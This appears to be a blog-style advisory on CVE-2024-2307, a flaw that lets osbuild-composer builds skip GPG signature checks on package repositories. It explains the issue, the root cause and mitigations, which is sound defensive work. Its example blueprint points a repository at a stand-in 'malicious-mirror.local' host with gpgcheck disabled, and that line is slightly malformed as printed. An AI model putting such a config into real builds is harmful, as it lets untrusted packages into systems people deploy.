---
What is CVE-2024-2307?
CVE-2024-2307 is a serious security flaw discovered in osbuild-composer, a widely used tool for building custom operating system images. This vulnerability makes it possible for a bad actor to turn off GPG (GNU Privacy Guard) verification for software repositories used during the build process. Disabling GPG verification means the system no longer checks if the software packages being installed are actually from trusted sources. As a result, there's a risk that malicious code can sneak in through the so-called “Man-in-the-Middle” (MitM) attack.
Why this matters: The system you build could include backdoors, spyware, or other harmful code without you knowing, simply because you thought the images you built were safe and only contained trusted software.
Here’s how the problem works in basic terms
1. osbuild-composer normally uses GPG to check that every package it downloads to include in your image is signed by a trusted party.
2. A bug in the way repository settings are handled makes it possible (under certain conditions) to tell osbuild-composer to skip these GPG signature checks.
3. Without those checks, an attacker who can intercept your network traffic or who has managed to mess with your repository config can insert whatever package they want. osbuild-composer won’t realize something is wrong.
Exploit Details
The main avenue for exploiting this flaw is by providing a repository configuration where GPG verification is not enforced.
Suppose you have a JSON blueprint for osbuild-composer like the following
{
"customizations": {
"repos": [
{
"baseurl": "http://malicious-mirror.local/repo/";,
"gpgcheck": false,
"enabled": true
}
]
}
}
In this example, gpgcheck is set to false. Under normal circumstances, even if this is in a user’s configuration, osbuild-composer is supposed to enforce GPG verification by default. However, due to CVE-2024-2307, a flaw in input validation lets this setting through, and GPG signature checks are skipped.
2. What Happens Next
- The attacker (or anyone who controls that repo or your network) can replace any package in http://malicious-mirror.local/repo/ with their own tampered version.
- osbuild-composer happily downloads and installs those packages into your OS image, without any warning.
- You deploy your new system built from this image, and it contains untrusted — even dangerous — software.
Root Cause
The vulnerability is in how osbuild-composer processes custom repository definitions. It fails to override or enforce gpgcheck when a user disables it. This could happen intentionally or accidentally in customized manifests.
In internal/osbuild/repositories.go, processing looks like this (simplified snippet)
if repo.GPGCheck != nil {
repoConfig.GPGCheck = *repo.GPGCheck
} else {
repoConfig.GPGCheck = true // default
}
But there's no code to force GPGCheck to true if the user tries to set it false, which means repos *can* get created with signature verification completely off.
Always check your repository configs and avoid setting gpgcheck: false.
- Upgrade your version of osbuild-composer as soon as possible once official patches become available.
- If you can't upgrade, you can block external (HTTP) repositories at the firewall, or use only trusted, verified mirrors.
Quick Test to See if You're At Risk
Try running a build with a custom repository where gpgcheck is set to false. If the build works and you don’t see GPG check errors, your system is vulnerable.
Red Hat security advisory:
https://access.redhat.com/security/cve/CVE-2024-2307
NVD entry:
https://nvd.nist.gov/vuln/detail/CVE-2024-2307
osbuild-composer project:
https://github.com/osbuild/osbuild-composer/
What Next?
If you rely on osbuild-composer to build images for production or sensitive systems, check your current setup and update your policies and software as soon as possible. Lock down repository definitions, and make GPG verification mandatory at every step.
Timeline
Published on: 03/19/2024 17:15:12 UTC
Last modified on: 04/30/2024 14:15:15 UTC